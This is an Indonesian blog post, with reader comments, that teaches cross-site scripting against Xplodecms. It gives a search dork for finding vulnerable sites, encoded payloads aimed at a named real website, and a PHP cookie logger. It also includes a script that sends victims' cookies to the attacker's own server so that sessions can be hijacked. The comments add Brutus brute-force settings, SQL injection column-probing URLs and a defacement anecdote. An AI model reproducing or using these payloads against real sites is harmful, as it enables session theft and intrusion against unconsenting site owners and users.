Xplodecms Cross Site Scripting (XSS) Injection


Tidak ada kapok-kapoknya para web programmer di kerjain dengan bug basi XSS. Mungkin si admin malas membaca kode ulang programmnya sendiri, atau memang meragukan bugs XSS. XSS merupakan bugs yang low risk, tapi XSS bisa merupakan bugs yang bisa sangat merugikan, seperti Cookie Stealing, yang berakibat ancaman Session Hijacking yang membuat kita menjadi orang lain di aplikasi web yang credential, seperti web banking.

Umumnya, Cross site scripting adalah tehnik hacking yang memanfaatkan kelemahan koding dari web aplikasi, yang membuat attacker dapat mengirimkan kode jahatnya ke dalam web aplikasi, dan mengambil keuntungan dari korban. Selengkapnya baca di ……………

tulisan ini mengambil contoh pada aplikasi Xplodecms, untuk percobaan alihkan browser anda ke google.com untuk proof of concept. Ketikkan di dalam box “allinurl:module_wrapper.asp?wrap_script=” tanpa tanda kutip,

untuk mengecek web aplication tersebut vulnerable atau tidak kita cek dengan sintaks,

<script>alert(400191613824)</script>

lalu kita encode agar bisa diterjemahkan oleh browser menjadi,

<script%20%0a%0d>alert(400191613824)%3B</script>

Contoh ;

http://www.garforthrangers.co.uk/module_wrapper.asp?wrap_script=
modules%2FSearch+results%2Fsearch%2Easp&SearchType=all&
SearchString=>”><script%20%0a%0d>alert(400191613824)%3B
</script>

Lalu muncul pop-up seperti ini,

xss

Cookie Stealing :

Bugs XSS bisa kita manfaatkan untuk mencuri identitas user yang sedang log-in di situs tersebut, tehnik ini dinamakan “Cookie Stealing”. Untuk melakukan Cookiestealing yang pertama kita buat script untuk mencatat cookies dengan nama “log.txt” dan kita chmod 777 untuk dapat ditulis, dan script untuk mengirimkan cookie ke server kita untuk dicatat.

Code grabcookie.php :

<?php
$cookie = $_GET[‘cookie’];
$log = fopen(“log.txt”, “a”);
fwrite($log, $cookie .”\n”);
fclose($log);
?>

Kita coba url berikut di address bar,

http://www.garforthrangers.co.uk/module_wrapper.asp?wrap_script=
modules/Search+results/search.asp&SearchType=all&SearchString=
>”><script%20%0a%0d>alert(document.cookie);</script>

Lalu muncul pop-up seperti ini,

cookie

Sekarang kita catat cookie ke server kita, dengan script grabcookie.php yang kita buat sebelumnya,

<script>document.location=’http://situsgue.com/grabcookie.php?
cookie=’+document.cookie;</script>

lalu kita coba ke target kita,

http://www.garforthrangers.co.uk/module_wrapper.asp?wrap_script=
modules/Search+results/search.asp&SearchType=all&SearchString=
>”><script%20%0a%0d>document.location=’http://situsgue.com/
grabcookie.php?cookie=’+document.cookie;</script>

Jika aplikasi tersebut mencimpan cookie di server, maka cookie akan dikirim ke tempat dimana kita persiapkan sebelumnya, yaitu pada file “log.txt” Aplikasi web, seperti forum, guestbook, dan memperbolehkan user untuk log-in memungkinkan aplikasi tersebut menggunakan cookie, lalu kita asumsikan aplikasi web tersebut tidak terfilter dengan baik, maka attacker dapat memasukkan kode javascript seperti di atas untuk mencuri cookie.

reference :
http://www.crosssitescripting.com

58 thoughts on “Xplodecms Cross Site Scripting (XSS) Injection

    • yah,, berarti anda kurang beruntung mas,, silahkan coba lagi🙂

      mencari target juga membutuhkan waktu gak sedikit mas,, kalo mau tahu bugs2 baru, ikuti saja blog ini🙂 hehehee

  1. mmmm gw udah berhasil masukin xss di suatu situs bos, tapi pake alert js =D ,, setelah gw coba pake dokumen cookies kok gagal yak? hehe

    • ooh gitu,,hmm,, berarti situs tersebut pada proses input,, sudah tersanitasi oleh si admin,, tapi karakter belum,, dasar tuh admin,, makasih sudah bookmark blog ini, tunggu artikel saya selanjutnya🙂

  2. ga full deface…. cuman di Frontpage pada satu halamanya aja. dibilang gini :

    HACKED
    By FuKoCaN

    Where Is Your Security ?
    One Turk Against The World

    pas googling ada sebuah website yang taruh tag hacking.. pas gw lihat kontentnya masih di hacking web worldfriend… atau di curi halamannya pas di deface sama dia…tp semua uda gw protek ke sistem IP and Security Proxy..pas di deface di ganti password adminnya untungkan gw bisa akalin… hahaha

    Jangan lupa gan Lapak gw masih di buka neh sampai bulan besok untuk pendaftaran DOmain Baru cuman 65.000 aja .INFO . IN , .BIZ , .Web.id(khusus Domain Web.id Free Host gan)selama 1 tahun penuh untuk paket blog Webhosting World Friend

    • jangan nyoba kesitus orang aja dulu,, mendingan coba aplikasi web disini http://sourceforge.net/projects/dvwa/..

      install xampp kalo windows, extrak aplikasinya trus install,,

      trus coba berbagai macam bugs aplikasi berbasis web disitu.. bebas gak perlu kuatir ditangkep polisi..

      nah aplikasi ntu tuh banyak banget bugsnya,, dikasih petunjuknya pula..

      selamat mencoba…😛

      • makasih mas…
        udah bisa sih nyobain dvwanya, tapi belum berhasil nyobain yang brute force dan sql injection, yang lain sih bisa, mas bisa nggak nyobain yang brute force dan sql injection…
        makasih

    • tanya dong mas..
      1. Jadi brute force yang di dvwa itu ngetesnya pake brutus ya mas?
      2. Brutus bisa diinstall di windows nggak sih mas?
      3. Kl di dvwa itu nyobain sql injectionnya gmn sih mas?minta clue nya dong…udah nyoba2 semua cara yang saya tau gk bisa mas…

      makasih…

  3. mmm, masih belum berhasil2 nih mas.
    Makeknya gimana sih mas?
    kok saya gk berhasil2. Di brutusnya malah ditemuin password yang salah.Udah cb2 pakai metode wordlist sama brute force sih.Di file wordlistnya malah udah saya tulis password yang sebenarnya, tapi brutusnya tetap gak bs nemuin, dan malah nemuin password yang salah. Sebenarnya make brutus dg web target dvwa itu gimana sih mas? makasih bgt atas bantuannya…

    • hehe…sori mas , terburu nafsu nih..penting soalnya..kl mas pakeknya GET ya?saya udah coba GET maupun POST.minta rincian settingannya dong mas?
      Kl rincian saya gini :
      Target:http://localhost/dvwa/vulnerabilities/brute/
      Type:HTML (Form)
      port:80
      Connections:10
      Timeout:10
      Method:GET
      Keepalive:cheklist
      Fakecookies:checklist
      Encode:checklist
      singleuser:checklist=isinya admin
      Passmode:Wordlist
      Pass file:words.txt
      Pada HTML form authentication definition, targetnya =http://localhost/dvwa/vulnerabilities/brute/ ,tp tidak mau diklik Learn Form Settingsnya.

      Udah,setelah itu diklik Start, tetapi yang muncul malah password yang salah mas…
      ada yg salah dg settingan saya mas?
      minta rincian settingannya dong mas?
      makasih banyak.

      • hmmm ituu,, targetnya belum tepat, karena kita pake HTML form authentication, maka kita juga harus ngasih tau letak skrip yang mau di brute force mana,,, jadi kalo contoh digambar http://localhost/dvwa/brute.php

        dan kita pake metode POST,,, karena gak ada form login dengan metode GET…

        sama-sama karna sudah berkunjung..

  4. mas pake dvwa yang versi sebelumnya ya?kl saya pake yang versi 1.0.6. jd linknya ke localhost/dvwa/vulnerabilities/brute/index.php. Tp tetep aja mas, yang ditampilin password yang salah. Malah yang di pass mode sya pilih brute force, dan password sebenarnya udah saya ganti cuma 1 karakter dan range brute forcenya min dan max karakternya saya isi 1 karakter, tetep aan laja brutusnya nampilin password yang salah.Apa karena brute force yang di dvwa versi saya tidak bisa dipakai ya? kl gt boleh minta dvwa versi yang mas punya gk?saya nyari2 yang versi sblm 1.0.6 gk dpt2 mas.Atau ada saran lain? makasih…

  5. kl minta cluenya aja bisa mas? Soalnya keburu nih mas, buat tugas. Semua code yang saya tau sudah sya masukkan ke sql injectionnya dvwa tp gk berhasil mas…makasih..

  6. udah mas, sampai munculin pesan error itu kan?cm sampai itu doang mas saya bisanya,blm bs langkah selanjutnya.lantas?…makasih

  7. oya mas, di helpnya dvwa ditulis If you have received a Magicquotes error, turn them off in php.ini. Ini mksdnya gmn ya mas? Mksdnya php.ini nya dvwa apa php.ini nya xampp mas? padahal magicquote error sudah saya off kan php.ini di keduanya(xampp & dvwa),kok masih sama saja.Atau mas lebih ngerti maksudnya…
    makasih…maaf bertanya terus mas,pengin menggali ilmu soalnya.

  8. maaf mas, nanya terus…
    sql injectionnya di dvwa itu memang bisa dicoba untuk mencuri username dan password ya?
    terima kasih…

    • Ko pake maf, tenang aja kalo mampu saya jawab. Kemarin testing,logika bisa. Cuma belum sempet nemuin POC nya, nanti gw publish, mas juga share ke gw ye,kalo dapet..Okeh.

      Mas,besok2 kalo mampir,komenya yang dihalaman pertama aja,. 🙂

  9. mas, kl source code dan database saya ini(http://rapidshare.com/files/386459207/Archive.rar.html) kok dideteksi berapa kolom yang ada kok tidak bisa y, padahal saya buat kolomny berjumlah 6 tetapi kok sya tes dengan cara ini
    http://www.target.com/news.php?id=1+order+by+1– // tidak ada error
    http://www.target.com/news.php?id=1+order+by+2– // tidak ada error
    http://www.target.com/news.php?id=1+order+by+3– // tidak ada error
    http://www.target.com/news.php?id=1+order+by+4– // tidak ada error
    http://www.target.com/news.php?id=1+order+by+5– // tidak ada error
    http://www.target.com/news.php?id=1+order+by+6– // tidak ada error
    http://www.target.com/news.php?id=1+order+by+7– // tidak ada error
    bahkan saya coba sampai order by 30- , tetapi tetap tidak ada error
    padahal harusnya ada error kan jika diberi masukan
    http://www.target.com/news.php?id=1+order+by+7– //seharusnya ada error yang muncul seperti “Unknown column ’7′ in ‘order clause’”, tetapi ternyata tidak mumcul error,
    hal ini apa penyebabnya mas?
    saya kok selalu berhenti pada tahap ini mas?
    satusatunya tahap yang bisa saya lewati kok cm tahap mengetahui apakah suatu aplikasi web vulnerable terhadap Sql Injection atau tidak, dengan
    http://www.target.com/news.php?id=1‘ yang memunculkan error You have an error in your SQL syntax; check the manual the …bla-bla…

    Source yang mas berikan juga sama mas, hanya berhasil sampai mengetahui apakah suatu aplikasi web vulnerable terhadap Sql Injection atau tidak dengan
    http://www.target.com/news.php?id=1‘ yang memunculkan error You have an error in your SQL syntax; check the manual the …bla-bla…
    selanjutnya mengecek jml kolom seperti dg order by 1-,order by 2-.. bla.bla..bla tidak berhasil.

    Mas bisa nggak kasih tau source sederhana seperti yang mas kasih yang bisa diserang sqlinejction tetapi yang lengkap, bukan sepotong-sepotong.juga kl bisa disertakan databasenya.
    sederhana saja gak papa mas, tetapi lengkap.Terima kasih banyak mas.maaf tanya terus.makasih…

  10. A chronometer may be the most accurate as well as
    the most costly mechanical. With new CEO, Alain Zimmermann, Baume Mercier Watches is refreshing their offerings inside the luxury watch arena.
    The trick is to buy a designer timepiece that you is going to be happy with for many season.

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s